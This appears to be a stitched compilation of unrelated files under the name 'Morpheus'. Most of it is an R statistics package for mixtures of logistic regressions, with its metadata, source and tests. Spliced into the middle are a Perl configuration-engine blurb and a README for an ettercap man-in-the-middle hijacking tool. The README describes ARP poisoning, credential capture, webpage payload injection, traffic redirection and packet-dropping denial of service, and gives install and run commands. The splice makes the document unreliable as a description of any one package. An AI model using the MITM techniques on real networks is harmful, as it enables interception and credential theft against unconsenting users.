Encoding: UTF-8
Package: morpheus
Title: Estimate Parameters of Mixtures of Logistic Regressions
Description: Mixture of logistic regressions parameters (H)estimation with
    (U)spectral methods. The main methods take d-dimensional inputs and a vector
    of binary outputs, and return parameters according to the GLMs mixture model
    (General Linear Model). For more details see chapter 3 in the PhD thesis of
		Mor-Absa Loum: <https://theses.fr/s156435>, available here
		<https://theses.hal.science/tel-01877796/document>.
Version: 1.0-5
Authors@R: c(person(given = "Benjamin",
                    family = "Auder",
                    role = c("aut", "cre"),
                    email = "benjamin.auder@universite-paris-saclay.fr"),
             person(given = "Mor-Absa",
                    family = "Loum",
                    role = "aut",
                    email = "morabsa.loum@univ-thies.sn"))
Depends: R (>= 3.5.0),
Imports: MASS, jointDiag, methods, pracma
Suggests: devtools, flexmix, parallel, testthat (>= 3.0.0), roxygen2
License: MIT + file LICENSE
Date: 2026-04-22
RoxygenNote: 7.3.3
URL: https://github.com/yagu0/morpheus
Collate: 'utils.R' 'A_NAMESPACE.R' 'computeMu.R' 'multiRun.R'
        'optimParams.R' 'plot.R' 'sampleIO.R'
Config/testthat/edition: 3
NeedsCompilation: yes
Packaged: 2026-05-11 00:19:11 UTC; ba
Author: Benjamin Auder [aut, cre],
  Mor-Absa Loum [aut]
Maintainer: Benjamin Auder <benjamin.auder@universite-paris-saclay.fr>
Repository: CRAN
Date/Publication: 2026-05-21 09:30:02 UTC
Built: R 4.6.0; aarch64-apple-darwin23; 2026-05-22 00:15:06 UTC; unix
Archs: morpheus.so.dSYM

# Generated by roxygen2: do not edit by hand

export(alignMatrices)
export(computeMoments)
export(computeMu)
export(generateSampleIO)
export(multiRun)
export(normalize)
export(optimParams)
export(plotBox)
export(plotCoefs)
export(plotHist)
export(pvalue)
importFrom(graphics,barplot)
importFrom(graphics,boxplot)
importFrom(graphics,hist)
importFrom(graphics,matplot)
importFrom(graphics,par)
importFrom(jointDiag,ajd)
importFrom(methods,new)
importFrom(pracma,integral)
importFrom(stats,integrate)
importFrom(stats,pchisq)
importFrom(stats,pnorm)
importFrom(stats,rbinom)
importFrom(stats,rmultinom)
importFrom(stats,rnorm)
importFrom(stats,runif)
importFrom(stats,sd)
importFrom(stats,var)
useDynLib(morpheus, .registration = TRUE)

[![Version](https://img.shields.io/badge/MORPHEUS-2.2-brightgreen.svg?maxAge=259200)]()
[![Stage](https://img.shields.io/badge/Release-STABLE-brightgreen.svg)]()
[![Build](https://img.shields.io/badge/Supported_OS-Linux-orange.svg)]()
[![AUR](https://img.shields.io/aur/license/yaourt.svg)]()

# Morpheus - automated ettercap TCP/IP Hijacking tool
![morpheus v2.2-BETA](http://i.cubeupload.com/SpNvM5.png)

    Version release: v2.2 - STABLE
    Author: pedro ubuntu  [ r00t-3xp10it ]
    Codename: oneiroi phobetor (The mithologic dream greek god)
    Distros Supported: Linux Ubuntu, Kali, Debian, BackBox, Parrot OS
    Suspicious-Shell-Activity© (SSA) RedTeam develop @2018

<br />

# LEGAL DISCLAMER
    The author does not hold any responsibility for the bad use of this tool,
    remember that attacking targets without prior consent it's illegal and punished by law.

# Framework description
    Morpheus it's a Man-In-The-Middle (mitm) suite that allows users to manipulate
    tcp/udp data using ettercap, urlsnarf, msgsnarf and tcpkill as backend applications.
    but this tool main objective its not to provide an easy way to exploit/sniff targets,
    but ratter a call of attemption to tcp/udp manipulations technics (etter filters)

    Morpheus ships with some pre-configurated filters but it will allow users to improve them
    when launch the attack (morpheus scripting console). In the end of the attack morpheus will
    revert the filter back to is default stage, this will allow users to improve filters at
    running time without the fear of messing with filter command syntax and spoil the filter.
    "Perfect for scripting fans to safely test new concepts"...

    HINT: morpheus allow you to improve filters in 2 diferent ways
    1º - Edit filter before runing morpheus and the 'changes' will be permanent
    2º - Edit filter using 'morpheus scripting console' and the changes are active only once


<br />

# What can we acomplish by using filters?
    morpheus comes with a collection of filters writen be me to acomplish various tasks:
    replacing images in webpages, replace text in webpages, inject payloads in webpages,
    denial-of-service attacks (drop,kill packets from source), redirect browser traffic
    to another domain and gives you the ability to build compile your filter from scratch
    and run it through morpheus framework (option W).

    "filters can be extended using browser languages like: javascript,css,flash,etc"...


> In this example we are using "<head> HTML tag" to inject an rediretion url into target request
![morpheus v1.6-Alpha](http://i.cubeupload.com/jn83zh.png)
> In this example we are using 'CSS3' to trigger webpage 180º rotation
![morpheus v1.6-Alpha](http://i.cubeupload.com/XSWm0P.png)

<br />

# Framework limitations
    1º - morpheus will fail if target system its protected againt arp poison atacks
    2º - target system sometimes needs to clear the net cache for arp poison to be effective
    3º - many attacks described in morpheus may be dropped by the target HSTS detection sys.


> 4º - morpheus needs ettercap to be executed with higth privileges (uid 0 | gid 0). <br />
> correct ettercap configuration display (running as Admin without ssl disectors active)
![morpheus v1.6-Alpha](http://i.cubeupload.com/RIq2yO.png)

    By default morpheus (at startup) will replace the original etter.conf/etter.dns files
    provided by ettercap. On exit morpheus will revert those files to is original state..
    [ ITS IMPORTANTE TO EXIT THE TOOL PROPER TO REVERT THE CHANGES MADE (press 'E' to exit) ]

<br />

# Dependencies
    required: ettercap, nmap, zenity, apache2
    sub-dependencies: driftnet, dsniff (urlsnarf,tcpkill,msgsnarf), sslstrip-0.9, dns2proxy

# Credits
    ettercap (alor&naga) | nmap (fyodor) | apache2 (Rob McCool) | dsniff (Dug Song)
    filters: irongeek (replace img) | seannicholls (rotate 180º) | TheBlaCkCoDeR09 (ToR-Browser-0day)

<br />

# Download/Install
      1º - git clone https://github.com/r00t-3xp10it/morpheus.git
      2º - cd morpheus
      3º - chmod -R +x *.sh
      4º - chmod -R +x *.py
      5º - nano settings
      6º - sudo ./morpheus.sh

<br /><br /><br />

## Nmap scans available [option S]<br />
![morpheus v2.2-Alpha](http://i.cubeupload.com/O2h9Hd.png)

      Morpheus v2.2 allows is users to scan with nmap sending one fake User_Agent [ IPhone ]
      Activate this special funtion in [ settings ] file under morpheus main folder.
      HINT: This setting its only available in morpheus [ scan LAN for live hosts ]

![morpheus v2.2-Alpha](http://i.cubeupload.com/hp9r2u.png)

      HINT: we can edit morpheus http.lua lib and input other user_agent,before run the tool.
      HINT: My http.lua lib modified also allows diferent user_agent inputs at run-time like:
      nmap -sV --script-args http.useragent="Apache-HttpClient/4.0.3 (java 1.5)" Target-Ip


![morpheus v2.2-Alpha](http://i.cubeupload.com/v1aIGd.png)

<br />

## Detecting DHCP requests to access local lan [option 17]<br />
![morpheus v2.2-Alpha](http://i.cubeupload.com/EKAYLP.jpg)

<br />

## Detecting-blocking crypto currency connections [option 18]<br />
![morpheus v2.2-Alpha](http://i.cubeupload.com/cbAoeY.png)

<br />

## Redirect all devices in LAN to google prank [option 19]<br />
![morpheus v2.2-Alpha](http://i.cubeupload.com/ZE4Cy5.png)
![morpheus v2.2-Alpha](http://i.cubeupload.com/xxmyex.png)
`HINT: This module depends of .im domain not beeing redirected`<br />

<br />

## firewall filter screenshots [option 1]<br />

    firewall [option 1] pre-configurated filter will capture credentials from the follow services:
    http,ftp,ssh,telnet (facebook uses https/ssl :( ) report suspicious connections, report common
    websocial browsing (facebook,twitter,youtube), report the existence of botnet connections like:
    Mocbot IRC Bot, Darkcomet, redirect browser traffic and allow users to block connections (drop,kill) 
    "Remmenber: morpheus gives is users the ability to 'add more rules' to filters befor execution"

    [morpheus] host:192.168.1.67   [ -> ]  port:23 telnet  ☆
               Source ip addr      flow    destination     rank good

    [morpheus] host:192.168.1.67   [ <- ]  port:23 telnet  ☠
               Destination ip      flow    source port     rank suspicious


![morpheus v2.2-Alpha](http://i.cubeupload.com/nbgSuj.png)

![morpheus v2.2-Alpha](http://i.cubeupload.com/Hx0JV4.png)

![morpheus v2.2-Alpha](http://i.cubeupload.com/LzqZGc.png)

![morpheus v2.2-Alpha](http://i.cubeupload.com/z8M94O.png)

> Basically firewall filter will act like one offensive and defensive tool analyzing the
> tcp/udp data flow to report logins,suspicious traffic,brute-force,block target ip,etc.
<br />

---


_EOF

# DESCRIPTION

Morpheus is a configuration engine that completely separates config consumers from config providers.

Consumers can obtain configuration values by using this module or *morph* script.
Configuration values are binded to various nodes in the global config tree, similar to virtual file system. Consumers can ask for any node or for any subtree.

Providers are plugins which can populate configuration tree from any sources: local configuration files, configuration database, environment, etc.
The overall program configuration is merged together from all data provided by plugins.

# CONFIGURATION TREE

Every config value is binded to a key inside the global configuration tree. Keys use */* as a separator of their parts, similar to usual filesystem conventions.

Any value which is a hashref will become the subtree in the configuration tree and will be merged with other values if possible. For example, if one plugin provides *{ foo => 5 }* for */blah* key, and another plugin provides *{ bar => 6 }* for */blah* key, then *morph("/blah")* will return *{ foo => 5, bar => 6 }*.

This archive contains the distribution Morpheus,
version 0.45:

  the ultimate configuration engine

This software is copyright (c) 2012 by Yandex LLC.

This is free software; you can redistribute it and/or modify it under
the same terms as the Perl 5 programming language system itself.

# Patch provided by Bettina Grün (flexmix author).
# https://cran.r-project.org/web/packages/flexmix/index.html

FLXMRglm <- function(formula=.~., family=gaussian, offset=NULL)
{
  if (is.character(family))
    family <- get(family, mode = "function", envir = parent.frame())
  if (is.function(family))
    family <- family()
  if (is.null(family$family)) {
    print(family)
    stop("'family' not recognized")
  }

  glmrefit <- function(x, y, w) {
    fit <- c(glm.fit(x, y, weights=w, offset=offset, family=family),
      list(call = sys.call(), offset = offset,
        control = eval(formals(glm.fit)$control),
        method = "weighted.glm.fit"))
    fit$df.null <- sum(w) + fit$df.null - fit$df.residual - fit$rank
    fit$df.residual <- sum(w) - fit$rank
    fit$x <- x
    fit
  }

  z <- new("FLXMRglm", weighted=TRUE, formula=formula,
    name=paste("FLXMRglm", family$family, sep=":"), offset = offset,
    family=family$family, refit=glmrefit)

  z@preproc.y <- function(x) {
    if (ncol(x) > 1)
      stop(paste("for the", family$family, "family y must be univariate"))
    x
  }

  if (family$family=="gaussian") {
    z@defineComponent <- function(para) {
      predict <- function(x, ...) {
        dotarg = list(...)
        if("offset" %in% names(dotarg)) offset <- dotarg$offset
        p <- x %*% para$coef
        if (!is.null(offset)) p <-  p + offset
        family$linkinv(p)
      }

      logLik <- function(x, y, ...)
        dnorm(y, mean=predict(x, ...), sd=para$sigma, log=TRUE)

      new("FLXcomponent",
        parameters=list(coef=para$coef, sigma=para$sigma),
        logLik=logLik, predict=predict,
        df=para$df)
    }

    z@fit <- function(x, y, w, component){
      fit <- glm.fit(x, y, w=w, offset=offset, family = family)
      z@defineComponent(para = list(coef = coef(fit), df = ncol(x)+1,
        sigma =  sqrt(sum(fit$weights * fit$residuals^2 /
        mean(fit$weights))/ (nrow(x)-fit$rank))))
    }
  }

  else if (family$family=="binomial") {
    z@preproc.y <- function(x) {
      if (ncol(x) != 2)
      {
        stop("for the binomial family, y must be a 2 column matrix\n",
          "where col 1 is no. successes and col 2 is no. failures")
      }
      if (any(x < 0))
        stop("negative values are not allowed for the binomial family")
      x
    }

    z@defineComponent <- function(para) {
      predict <- function(x, ...) {
        dotarg = list(...)
        if("offset" %in% names(dotarg))
          offset <- dotarg$offset
        p <- x %*% para$coef
        if (!is.null(offset))
          p <- p + offset
        family$linkinv(p)
      }
      logLik <- function(x, y, ...)
      dbinom(y[,1], size=rowSums(y), prob=predict(x, ...), log=TRUE)

      new("FLXcomponent",
        parameters=list(coef=para$coef),
        logLik=logLik, predict=predict,
        df=para$df)
    }

    z@fit <- function(x, y, w, component) {
      fit <- glm.fit(x, y, weights=w, family=family, offset=offset, start=component$coef)
      z@defineComponent(para = list(coef = coef(fit), df = ncol(x)))
    }
  }

  else if (family$family=="poisson") {
    z@defineComponent <- function(para) {
      predict <- function(x, ...) {
        dotarg = list(...)
        if("offset" %in% names(dotarg)) offset <- dotarg$offset
        p <- x %*% para$coef
        if (!is.null(offset)) p <- p + offset
        family$linkinv(p)
      }
      logLik <- function(x, y, ...)
        dpois(y, lambda=predict(x, ...), log=TRUE)

      new("FLXcomponent",
        parameters=list(coef=para$coef),
        logLik=logLik, predict=predict,
        df=para$df)
    }

    z@fit <- function(x, y, w, component) {
      fit <- glm.fit(x, y, weights=w, family=family, offset=offset, start=component$coef)
      z@defineComponent(para = list(coef = coef(fit), df = ncol(x)))
    }
  }

  else if (family$family=="Gamma") {
    z@defineComponent <- function(para) {
      predict <- function(x, ...) {
        dotarg = list(...)
        if("offset" %in% names(dotarg)) offset <- dotarg$offset
        p <- x %*% para$coef
        if (!is.null(offset)) p <- p + offset
        family$linkinv(p)
      }
      logLik <- function(x, y, ...)
        dgamma(y, shape = para$shape, scale=predict(x, ...)/para$shape, log=TRUE)

      new("FLXcomponent",
        parameters = list(coef = para$coef, shape = para$shape),
        predict = predict, logLik = logLik,
        df = para$df)
    }

    z@fit <- function(x, y, w, component) {
      fit <- glm.fit(x, y, weights=w, family=family, offset=offset, start=component$coef)
      z@defineComponent(para = list(coef = coef(fit), df = ncol(x)+1,
        shape = sum(fit$prior.weights)/fit$deviance))
    }
  }

  else stop(paste("Unknown family", family))
  z
}

# Example usage:

#library("flexmix")
#data("tribolium", package = "flexmix")
#set.seed(1234)
### uses FLXMRglm() from package.
#tribMix <- initFlexmix(cbind(Remaining, Total - Remaining) ~ Species,
#                       k = 2, nrep = 5, data = tribolium,
#                       model = FLXMRglm(family = "binomial"))
#parameters(tribMix); logLik(tribMix)
##source("FLXMRglm.R")
#set.seed(1234)
### uses FLXMRglm() from source file which allows to specify link.
#tribMixNew <- initFlexmix(cbind(Remaining, Total - Remaining) ~ Species,
#                          k = 2, nrep = 5, data = tribolium,
#                          model = FLXMRglm(family = "binomial"))
#parameters(tribMixNew); logLik(tribMixNew)
#set.seed(1234)
#tribMixlogit <- initFlexmix(cbind(Remaining, Total - Remaining) ~ Species,
#                            k = 2, nrep = 5, data = tribolium,
#                            model = FLXMRglm(family = binomial(link = logit)))
#parameters(tribMixlogit); logLik(tribMixlogit)
#set.seed(1234)
#tribMixprobit <- initFlexmix(cbind(Remaining, Total - Remaining) ~ Species,
#                             k = 2, nrep = 5, data = tribolium,
#                             model = FLXMRglm(family = binomial(link = probit)))
#parameters(tribMixprobit); logLik(tribMixprobit)

# simulateMr
#
# Simulate an output of multiRun(...), because this function is a little
# complicated to call in an example (see ?multiRun).
#
# Usage: simulateMr(c(nrow, ncol), N)
# where nrow,ncol = dimension of the parameter and N = number of "runs"
#
# Always length(mr) == 2 and random parameter + noise, to not over-parameterize.
#
# Return a list with mr = simulated multiRun() output, and theta = parameter matrix.
simulateMr <- function(dims, N)
{
  library(morpheus)
  mr <- list()
  theta <- matrix(runif(min=-5,max=5,n=dims[1]*dims[2]), ncol=dims[1])
  for (i in 1:2) {
    mr[[i]] <- list()
    for (j in 1:N)
      mr[[i]][[j]] <- theta + matrix(rnorm(dims[1]*dims[2],sd=0.25),ncol=dims[1])
    mr[[i]] <- alignMatrices(mr[[i]], ref=theta, ls_mode="exact")
  }
  list(mr = mr, theta = theta)
}

#' Generate sample inputs-outputs
#'
#' Generate input matrix X of size nxd and binary output of size n, where Y is subdivided
#' into K groups of proportions p. Inside one group, the probability law P(Y=1) is
#' described by the corresponding column parameter in the matrix beta + intercept b.
#'
#' @name generateSampleIO
#'
#' @param n Number of individuals
#' @param p Vector of K(-1) populations relative proportions (sum (<)= 1)
#' @param beta Vectors of model parameters for each population, of size dxK
#' @param b Vector of intercept values (use rep(0,K) for no intercept)
#' @param link Link type; "logit" or "probit"
#'
#' @return A list with
#' \itemize{
#'   \item{X: the input matrix (size nxd)}
#'   \item{Y: the output vector (size n)}
#'   \item{index: the population index (in 1:K) for each row in X}
#' }
#'
#' @examples
#' # K = 3 so we give first two components of p: 0.3 and 0.3 (p[3] = 0.4)
#' io <- generateSampleIO(1000, c(.3,.3),
#'   matrix(c(1,3,-1,1,2,1),ncol=3), c(.5,-1,0), "logit")
#' io$index[1] #number of the group of X[1,] and Y[1] (in 1...K)
#'
#' @export
generateSampleIO <- function(n, p, beta, b, link)
{
  # Check arguments
  tryCatch({n <- as.integer(n)}, error=function(e) stop("Cannot convert n to integer"))
  if (length(n) > 1)
    warning("n is a vector but should be scalar: only first element used")
  if (n <= 0)
    stop("n: positive integer")
  if (!is.matrix(beta) || !is.numeric(beta) || any(is.na(beta)))
    stop("beta: real matrix, no NAs")
  K <- ncol(beta)
  if (!is.numeric(p) || length(p)<K-1 || any(is.na(p)) || any(p<0) || sum(p) > 1)
    stop("p: positive vector of size >= K-1, no NA, sum(<)=1")
  if (length(p) == K-1)
    p <- c(p, 1-sum(p))
  if (!is.numeric(b) || length(b)!=K || any(is.na(b)))
    stop("b: real vector of size K, no NA")

  # Random generation of the size of each population in X~Y (unordered)
  classes <- rmultinom(1, n, p)

  d <- nrow(beta)
  zero_mean <- rep(0,d)
  id_sigma <- diag(rep(1,d))
  X <- matrix(nrow=0, ncol=d)
  Y <- c()
  index <- c()
  for (i in 1:K)
  {
    index <- c(index, rep(i, classes[i]))
    newXblock <- MASS::mvrnorm(classes[i], zero_mean, id_sigma)
    arg_link <- newXblock %*% beta[,i] + b[i]
    probas <-
      if (link == "logit")
      {
        e_arg_link = exp(arg_link)
        e_arg_link / (1 + e_arg_link)
      }
      else #"probit"
        pnorm(arg_link)
    probas[is.nan(probas)] = 1 #overflow of exp(x)
    X <- rbind(X, newXblock)
    Y <- c( Y, vapply(probas, function(p) (rbinom(1,1,p)), 1) )
  }
  shuffle <- sample(n)
  list("X"=X[shuffle,], "Y"=Y[shuffle], "index"=index[shuffle])
}

#' normalize
#'
#' Normalize a vector or a matrix (by columns), using euclidian norm
#'
#' @param x Vector or matrix to be normalized
#'
#' @return The normalized matrix (1 column if x is a vector)
#'
#' @examples
#' x <- matrix(c(1,2,-1,3), ncol=2)
#' normalize(x) #column 1 is 1/sqrt(5) (1 2),
#'              #and column 2 is 1/sqrt(10) (-1, 3)
#'
#' @export
normalize <- function(x)
{
  x <- as.matrix(x)
  norm2 <- sqrt( colSums(x^2) )
  sweep(x, 2, norm2, '/')
}

#' pvalue
#'
#' Compute the p-values of the tests beta[i,j] == 0 vs != 0
#'
#' @param mr A list of matrices as output by multiRun()
#'
#' @return The matrix of p-values (same size as mr[[1]])
#'
#' @examples
#' # Next line should be a real call to multiRun()
#' mr <- list( list(matrix(c(1,2,3,4),ncol=2),matrix(c(2,2,1,1),ncol=2)) )
#' p <- pvalue(mr[[1]])
#'
#' @export
pvalue <- function(mr)
{
  n = nrow(mr[[1]])
  m = ncol(mr[[1]])
  pval <- matrix(nrow=n, ncol=m)
  for (x in 1:n) {
    for (y in 1:m) {
      coefs <- sapply(mr, function(m) m[x,y])
      stat_test <- mean(coefs^2) / var(coefs)
      pval[x, y] <- 1 - pchisq(stat_test, 1)
    }
  }
  pval
}

# Computes a tensor-vector product
#
# @param Te third-order tensor (size dxdxd)
# @param w vector of size d
#
# @return Matrix of size dxd
#
.T_I_I_w <- function(Te, w)
{
  d <- length(w)
  Ma <- matrix(0,nrow=d,ncol=d)
  for (j in 1:d)
    Ma <- Ma + w[j] * Te[,,j]
  Ma
}

# Computes the second-order empirical moment between input X and output Y
#
# @param X matrix of covariates (of size n*d)
# @param Y vector of responses (of size n)
#
# @return Matrix of size dxd
#
.Moments_M2 <- function(X, Y)
{
  n <- nrow(X)
  d <- ncol(X)
  M2 <- matrix(0,nrow=d,ncol=d)
  matrix( .C("Moments_M2", X=as.double(X), Y=as.double(Y), pn=as.integer(n),
    pd=as.integer(d), M2=as.double(M2), PACKAGE="morpheus")$M2, nrow=d, ncol=d)
}

# Computes the third-order empirical moment between input X and output Y
#
# @param X matrix of covariates (of size n*d)
# @param Y vector of responses (of size n)
#
# @return Array of size dxdxd
#
.Moments_M3 <- function(X, Y)
{
  n <- nrow(X)
  d <- ncol(X)
  M3 <- array(0,dim=c(d,d,d))
  array( .C("Moments_M3", X=as.double(X), Y=as.double(Y), pn=as.integer(n),
    pd=as.integer(d), M3=as.double(M3), PACKAGE="morpheus")$M3, dim=c(d,d,d) )
}

#' computeMoments
#'
#' Compute cross-moments of order 1,2,3 from X,Y
#'
#' @inheritParams computeMu
#'
#' @return A list L where L[[i]] is the i-th cross-moment
#'
#' @examples
#' X <- matrix(rnorm(100), ncol=2)
#' Y <- rbinom(100, 1, .5)
#' M <- computeMoments(X, Y)
#'
#' @export
computeMoments = function(X, Y)
  list( colMeans(Y * X), .Moments_M2(X,Y), .Moments_M3(X,Y) )

# Find the optimal assignment (permutation) between two sets (minimize cost)
#
# @param distances The distances matrix, in columns
#   (distances[i,j] is distance between i and j)
#
# @return A permutation minimizing cost
#
.hungarianAlgorithm <- function(distances)
{
  n <- nrow(distances)
  .C("hungarianAlgorithm", distances=as.double(distances), pn=as.integer(n),
    assignment=integer(n), PACKAGE="morpheus")$assignment
}

#' alignMatrices
#'
#' Align a set of parameters matrices, with potential permutations.
#'
#' @param Ms A list of matrices, all of same size DxK
#' @param ref A reference matrix to align other matrices with
#' @param ls_mode How to compute the labels assignment: "exact" for exact algorithm
#'   (default, but might be time-consuming, complexity is O(K^3) ), or "approx1", or
#'   "approx2" to apply a greedy matching algorithm (heuristic) which for each column in
#'   reference (resp. in current row) compare to all unassigned columns in current row
#'   (resp. in reference)
#'
#' @return The aligned list (of matrices), of same size as Ms
#'
#' @examples
#' m1 <- matrix(c(1,1,0,0),ncol=2)
#' m2 <- matrix(c(0,0,1,1),ncol=2)
#' ref <- m1
#' Ms <- list(m1, m2, m1, m2)
#' a <- alignMatrices(Ms, ref, "exact")
#' # a[[i]] is expected to contain m1 for all i
#'
#' @export
alignMatrices <- function(Ms, ref, ls_mode=c("exact","approx1","approx2"))
{
  if (!is.matrix(ref) || any(is.na(ref)))
    stop("ref: matrix, no NAs")
  ls_mode <- match.arg(ls_mode)

  K <- ncol(Ms[[1]])
  L <- length(Ms)
  for (i in 1:L)
  {
    m <- Ms[[i]] #shorthand

    if (ls_mode == "exact")
    {
      #distances[i,j] = distance between m column i and ref column j
      distances = apply( ref, 2, function(col) ( sqrt(colSums((m-col)^2)) ) )
      assignment = .hungarianAlgorithm(distances)
      col <- m[,assignment]
      Ms[[i]] <- col
    }
    else
    {
      # Greedy matching:
      #   approx1: li[[i]][,j] is assigned to m[,k] minimizing dist(li[[i]][,j],m[,k'])
      #   approx2: m[,j] is assigned to li[[i]][,k] minimizing dist(m[,j],li[[i]][,k'])
      available_indices = 1:K
      for (j in 1:K)
      {
        distances =
          if (ls_mode == "approx1")
          {
            apply(as.matrix(m[,available_indices]), 2,
              function(col) ( sqrt(sum((col - ref[,j])^2)) ) )
          }
          else #approx2
          {
            apply(as.matrix(ref[,available_indices]), 2,
              function(col) ( sqrt(sum((col - m[,j])^2)) ) )
          }
        indMin = which.min(distances)
        if (ls_mode == "approx1")
        {
          col <- m[ , available_indices[indMin] ]
          Ms[[i]][,j] <- col
        }
        else #approx2
        {
          col <- available_indices[indMin]
          Ms[[i]][,col] <- m[,j]
        }
        available_indices = available_indices[-indMin]
      }
    }
  }
  Ms
}

test_that("HungarianAlgorithm provides the correct answer on various inputs",
{
  set.seed(42)
  for (n in c(2,3,10,50))
  {
    for (repetition in 1:3)
    {
      # Generate a random vector, and permute it:
      # we expect the algorithm to retrieve the permutation
      v <- runif(n, min=-1, max=1)
      permutation <- sample(1:n)
      v_p <- v[permutation]

      # v is reference, v_p is v after permutation
      # distances[i,j] = distance between i-th component of v
      # and j-th component of v_p
      # "in rows : reference; in columns: after permutation"
      # "permutation" contains order on v to match v_p as closely as possible
      distances <- sapply(v_p, function(elt) ( abs(elt - v) ) )
      assignment <- .hungarianAlgorithm(distances)
      expect_equal(assignment, permutation)
    }
  }
})

# Helper to generate a random series of matrices to align
.generateMatrices = function(d, K, N, noise)
{
  matrices = list( matrix(runif(d*K, min=-1, max=1),ncol=K) ) #reference
  for (i in 2:(N+1))
  {
    matrices[[i]] <- matrices[[1]][,sample(1:K)]
    if (noise)
      matrices[[i]] = matrices[[i]] + matrix(rnorm(d*K, sd=0.05), ncol=K)
  }
  matrices
}

test_that("labelSwitchingAlign correctly aligns de-noised parameters",
{
  set.seed(32)
  N <- 30 #number of matrices
  d_K_list <- list(c(2,2), c(5,3))
  for (i in 1:2)
  {
    d <- d_K_list[[i]][1]
    K <- d_K_list[[i]][2]

    # 1] Generate matrix series
    Ms <- .generateMatrices(d, K, N, noise=FALSE)

    # 2] Call align function with mode=approx1
    aligned <- alignMatrices(Ms[2:(N+1)], ref=Ms[[1]], ls_mode="approx1")

    # 3] Check alignment
    for (j in 1:N)
      expect_equal(aligned[[j]], Ms[[1]])

    # 2bis] Call align function with mode=approx2
    aligned <- alignMatrices(Ms[2:(N+1)], ref=Ms[[1]], ls_mode="approx2")

    # 3bis] Check alignment
    for (j in 1:N)
      expect_equal(aligned[[j]], Ms[[1]])
  }
})

test_that("labelSwitchingAlign correctly aligns noisy parameters",
{
  set.seed(32)
  N <- 30 #number of matrices
  d_K_list <- list(c(2,2), c(5,3))
  for (i in 1:2)
  {
    d <- d_K_list[[i]][1]
    K <- d_K_list[[i]][2]
    max_error <- d * 0.2 #TODO: what value to choose ?

    # 1] Generate matrix series
    Ms <- .generateMatrices(d, K, N, noise=TRUE)

    # 2] Call align function
    aligned <- alignMatrices(Ms[2:(N+1)], ref=Ms[[1]], ls_mode="exact")

    # 3] Check alignment
    for (j in 2:N)
      expect_lt( norm(aligned[[j]] - Ms[[1]]), max_error )
  }
})

test_that("on input of sufficient size, beta/||beta|| is estimated accurately enough",
{
  set.seed(42)
  n <- 100000
  d <- 2
  K <- 2
  p <- 1/2

  betas_ref <- array( c(1,0,0,1 , 1,-2,3,1), dim=c(d,K,2) )
  for (i in 1:(dim(betas_ref)[3]))
  {
    mu_ref <- normalize(betas_ref[,,i])
    for (link in c("logit","probit"))
    {
      cat("\n\n",link," :\n",sep="")

      io <- generateSampleIO(n, p, betas_ref[,,i], rep(0,K), link)
      mu <- computeMu(io$X, io$Y, list(K=K))
      mu_aligned <- alignMatrices(list(mu), ref=mu_ref, ls_mode="exact")[[1]]

      #Some traces: 0 is not well estimated, but others are OK
      cat("Reference normalized matrix:\n")
      print(mu_ref)
      cat("Estimated normalized matrix:\n")
      print(mu_aligned)
      cat("Difference norm (Matrix norm ||.||_1, max. abs. sum on a column)\n")
      diff_norm <- norm(mu_ref - mu_aligned)
      cat(diff_norm,"\n")

      # NOTE: 0.5 is loose threshold, but values around 0.3 are expected...
      expect_lt( diff_norm, 0.5 )
    }
  }
})

test_that("both versions of Moments_Mi agree on various inputs",
{
  for (n in c(20,200))
  {
    for (d in c(2,10,20))
    {
      E <- diag(d)
      Id <- as.double(E)
      X <- matrix( rnorm(n*d), nrow=n )
      Y <- rbinom(n, 1, .5)
      M2 <- as.double(.Moments_M2(X,Y))
      M2_R <- colMeans(Y * t( apply(X, 1, function(Xi) Xi %o% Xi - Id) ))
      expect_equal(max(abs(M2 - M2_R)), 0)
      M3 <- as.double(.Moments_M3(X,Y))
      M3_R <- colMeans(Y * t( apply(X, 1, function(Xi) {
        return (Xi %o% Xi %o% Xi -
          Reduce('+', lapply(1:d, function(j)
            as.double(Xi %o% E[j,] %o% E[j,])), rep(0, d*d*d)) -
          Reduce('+', lapply(1:d, function(j)
            as.double(E[j,] %o% Xi %o% E[j,])), rep(0, d*d*d)) -
          Reduce('+', lapply(1:d, function(j)
            as.double(E[j,] %o% E[j,] %o% Xi)), rep(0, d*d*d))) } ) ))
      expect_equal(max(abs(M3 - M3_R)), 0)
    }
  }
})

#auxiliary to test diagonality
.computeMuCheckDiag = function(X, Y, K, jd_method, beta_ref)
{
  set.seed(99)
  d <- ncol(X)
  #TODO: redundant code, same as computeMu() main method. Comments are stripped
  M3 <- .Moments_M3(X,Y)
  M2_t <- array(dim=c(d,d,d))
  for (i in 1:d)
  {
    rho <- c(rep(0,i-1),1,rep(0,d-i))
    M2_t[,,i] <- .T_I_I_w(M3,rho)
  }
  jd <- jointDiag::ajd(M2_t, method=jd_method)
  V <- if (jd_method=="uwedge") jd$B else solve(jd$A)
  M2_t <- array(dim=c(d,d,K))
  for (i in 1:K)
    M2_t[,,i] <- .T_I_I_w(M3,V[,i])
  #END of computeMu() code

  max_error <- 1.0 #TODO: tune ?
  invbeta <- MASS::ginv(beta_ref)
  for (i in 1:K)
  {
    shouldBeDiag <- invbeta %*% M2_t[,,i] %*% t(invbeta)
    expect_lt(
      mean( abs(shouldBeDiag[upper.tri(shouldBeDiag) | lower.tri(shouldBeDiag)]) ),
      max_error)
  }
}

test_that("'jedi' and 'uwedge' joint-diagonalization methods return a correct matrix",
{
  set.seed(99)
  n <- 10000
  d_K <- list( c(2,2), c(5,3), c(20,13) )

  for (dk_index in 1:length(d_K))
  {
    d <- d_K[[dk_index]][1]
    K <- d_K[[dk_index]][2]
    #NOTE: sometimes large errors if pr is not balanced enough (e.g. random);
    #      same note for beta. However we could be more random than that...
    beta_ref <- rbind(diag(K),matrix(0,nrow=d-K,ncol=K))
    io <- generateSampleIO(n, p=rep(1/K,K-1), beta=beta_ref, rep(0,K), link="logit")
#    .computeMuCheckDiag(io$X, io$Y, K, jd_method="uwedge", beta_ref) #TODO: sometimes failing test
    #TODO: some issues with jedi method (singular system)
    #.computeMuCheckDiag(io$X, io$Y, K, jd_method="jedi", beta_ref)
  }
})

#' @include utils.R
#'
#' @useDynLib morpheus, .registration = TRUE
#'
#' @importFrom jointDiag ajd
#' @importFrom stats rbinom rmultinom rnorm pnorm runif integrate sd var pchisq
#' @importFrom graphics boxplot barplot hist par matplot
#' @importFrom methods new
#' @importFrom pracma integral
#'
NULL

#' Compute mu
#'
#' Estimate the normalized columns mu of the beta matrix parameter in a mixture of
#' logistic regressions models, with a spectral method described in the package vignette.
#'
#' @name computeMu
#'
#' @param X Matrix of input data (size nxd)
#' @param Y Vector of binary outputs (size n)
#' @param optargs List of optional argument:
